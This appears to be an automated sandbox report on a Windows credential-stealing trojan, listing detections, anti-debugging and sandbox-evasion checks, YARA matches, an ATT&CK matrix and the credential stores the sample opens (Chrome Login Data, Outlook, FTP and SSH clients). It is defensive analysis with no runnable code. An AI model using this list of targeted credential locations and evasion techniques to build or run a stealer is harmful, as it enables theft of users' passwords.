              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeReversingLabs: Detection: 84%
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeVirustotal: Detection: 83%
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess created: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess created: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@4/1
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000003.354218547.00000000020D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_004627C3 CreateToolhelp32Snapshot,Process32FirstW,VirtualAlloc,
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe PID: 1840, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_00465440 push 0046546Ch; ret
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_0045E8CC push 0045E8F8h; ret
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_00465538 push 0046555Eh; ret
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe TID: 676Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeThread delayed: delay time: 60000
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeAPI call chain: ExitProcess graph end node
              Source: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe, 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess queried: DebugFlags
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess queried: DebugObjectHandle
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeSection loaded: unknown target: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeProcess created: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeCode function: 0_2_0045FE63 cpuid
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe PID: 1840, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000001.00000002.372103621.0000000002937000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.371920338.0000000000738000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe PID: 5976, type: MEMORYSTR
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.27a0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.HEUR-Trojan.Win32.Kryptik.gen-ba2fdc59950c64a.exe.2460000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.354230910.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.354156743.0000000002460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath Interception111
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              111
              Security Software Discovery
              Remote Services1
              Email Collection
              Exfiltration Over Other Network Medium2
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts121
              Virtualization/Sandbox Evasion
              1
              Input Capture
              121
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Input Capture
              Exfiltration Over Bluetooth3
              Non-Application Layer Protocol
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
              Process Injection
              1
              Credentials in Registry
              2
              Process Discovery
              SMB/Windows Admin Shares2
              Data from Local System
              Automated Exfiltration113
              Application Layer Protocol
